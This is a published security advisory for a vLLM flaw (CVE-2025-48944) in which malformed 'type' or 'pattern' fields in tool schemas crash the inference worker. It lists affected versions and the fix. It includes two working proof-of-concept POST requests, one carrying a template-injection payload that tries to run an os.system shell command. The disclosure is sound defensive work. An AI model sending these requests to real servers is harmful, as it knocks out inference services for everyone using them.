GHSA-vrq3-r879-7m65

Suggest an improvement
Source
https://github.com/advisories/GHSA-vrq3-r879-7m65
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrq3-r879-7m65/GHSA-vrq3-r879-7m65.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-vrq3-r879-7m65
Aliases
  • CVE-2025-48944
Published
2025-05-28T19:42:32Z
Modified
2025-05-30T21:47:09.830960Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
vLLM Tool Schema allows DoS via Malformed pattern and type Fields
Details

Summary

The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/jsonschemaconverter.cc:637: Unsupported type "somethingornothing"

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

Unclosed {, [, or (

Closed:{} and []

Here are some of runtime errors on the crash depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regexconverter.cc:73: Regex parsing error at position 4: The parenthesis is not closed. RuntimeError: [10:52:27] /project/cpp/regexconverter.cc:73: Regex parsing error at position 2: Invalid repetition count. RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.

PoC

Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for: POST /v1/chat/completions HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Content-Length: 579 Origin: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive

{ "model": "mistral-nemo-instruct", "messages": [{ "role": "user", "content": "crash via type" }], "tools": [ { "type": "function", "function": { "name": "crash01", "parameters": { "type": "object", "properties": { "a": { "type": "something" } } } } } ], "toolchoice": { "type": "function", "function": { "name": "crash01", "arguments": { "a": "test" } } }, "stream": false, "maxtokens": 1 }

Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.

POST /v1/chat/completions HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Content-Length: 718 Origin: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive

{ "model": "mistral-nemo-instruct", "messages": [ { "role": "user", "content": "Crash via Pattern" } ], "tools": [ { "type": "function", "function": { "name": "crash02", "parameters": { "type": "object", "properties": { "a": { "type": "string", "pattern": "{{ import('os').system('echo RCEOK > /tmp/pwned') or 'SAFE' }}" } } } } } ], "toolchoice": { "type": "function", "function": { "name": "crash02" } }, "stream": false, "maxtokens": 32, "temperature": 0.2, "topp": 1, "n": 1 }

Impact

Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests.

Fix

  • https://github.com/vllm-project/vllm/pull/17623
Database specific
{
    "nvd_published_at": "2025-05-30T19:15:30Z",
    "cwe_ids": [
        "CWE-20"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-28T19:42:32Z"
}
References

Affected packages

PyPI / vllm

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0.8.0
Fixed
0.9.0

Affected versions

0.*

0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.8.5.post1